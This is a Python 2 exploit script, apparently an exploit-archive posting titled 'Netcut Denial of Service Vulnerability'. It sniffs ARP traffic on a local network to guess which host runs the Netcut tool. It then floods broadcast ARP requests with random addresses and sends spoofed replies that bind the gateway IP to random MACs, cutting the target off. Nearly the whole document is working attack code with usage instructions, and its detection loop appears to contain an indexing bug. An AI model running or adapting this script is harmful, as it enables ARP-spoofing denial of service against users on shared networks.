#!/usr/bin/env python
#Exploit Title: Netcut Denial of Service Vulnerability
#Author: MaYaSeVeN
#Blog: http://mayaseven.blogspot.com
#PoC: Video  http://www.youtube.com/user/mayaseven
#     Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png
#Version: Netcut 2
#Software Link: http://www.mediafire.com/?jiiyq2wcpp41266
#Tested on: Windows Xp, Windows 7
#Greetz :  ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma

from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf
import commands,os,sys

#gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
gw_ip  = commands.getoutput("ip route list | grep default").split()[2]

def protect(gw_ip,gw_mac):
    os.popen("arp -s %s %s" %(gw_ip,gw_mac))
    print "Protected himself"

def detect():
        ans = sniff(filter=\'arp\',timeout=7)
        target=[]
        for r in ans.res:
            target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%"))
        return target

def preattack(gw_ip):
    num = []
    count = 0
    target = 0
    temp = 0
    print "Detecting..."
    d = detect()
    for i in range(len(d)):
        if d[i].split()[0] == "255.255.255.255":
            num.append(d.count(d[i]))
            if d.count(d[i]) > count:
                count = d.count(d[i])
                target = i
        if d[i].split()[0] == gw_ip:
            temp += 1
    if len(d) < 7:
        print "[-] No one use Netcut or try again"
        exit()
    if len(num)*7 < temp:
        num[:] = []
        count = 0
        result = float(temp)/len(d)*100
        for j in range(len(d)):
            if d[i].split()[0] == gw_ip:
                num.append(d.count(d[j]))
                if d.count(d[i]) > count:
                    count = d.count(d[i])
                    target = i
            num.reverse()
            result = float(temp)/len(d)*100
        print target
    else:
        num.reverse()
        result = float(num[0]+temp)/len(d)*100

    print "There is a possibility that " + str(result) + "%"
    if result>= 50:
        target_mac = d[target].split()[1]
        target_ip = d[target].split()[2]
        print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac)
        attack(target_mac,target_ip,gw_ip)
    else:
        print "[-] No one use Netcut or try again"

def attack(target_mac,target_ip,gw_ip):
    print "[+]Counter Attack !!!"
    e = Ether(dst="FF:FF:FF:FF:FF:FF")
    while 1:
        a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1)
        p = e/a/Padding("\\x00"*18)
        sendp(p,verbose=0)
        a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2)
        p1 = e/a1/Padding("\\x00"*18)
        sendp(p1,verbose=0)

if __name__ == \'__main__\':
    os.system("clear")
    print   "###################################################"
    print    " __  __    __     __    _____   __      __  _   _"
    print    "|  \\/  |   \\ \\   / /   / ____|  \\ \\    / / | \\ | |"
    print    "| \\  / | __ \\ \\_/ /_ _| (___   __\\ \\  / /__|  \\| |"
    print    "| |\\/| |/ _\\ \\   / _\\ |\\___ \\ / _ \\ \\/ / _ \\ . \\ |"
    print    "| |  | | (_| || | (_| |____) |  __/\\  /  __/ |\\  |"
    print    "|_|  |_|\\__,_||_|\\__,_|_____/ \\___| \\/ \\___|_| \\_|"
    print   " "
    print   "###################################################"
    print   ""
    print   "http://mayaseven.blogspot.com"
    print   ""
    if len(sys.argv) == 2 or len(sys.argv) == 3:
        if len(sys.argv) == 2:
            conf.iface=sys.argv[1]
            preattack(gw_ip)
        if len(sys.argv) == 3:
            conf.iface=sys.argv[1]
            gw_mac = sys.argv[2]
            protect(gw_ip,gw_mac)
            preattack(gw_ip)
    else:
        print \'\'\'Mode:
1.)Attack only
Usage: NetcutKiller <Interface>
e.g. NetcutKiller.py wlan0

2.)Attack with protect himself
Usage: NetcutKiller <Interface> <MAC_Gateway>
e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF
\'\'\'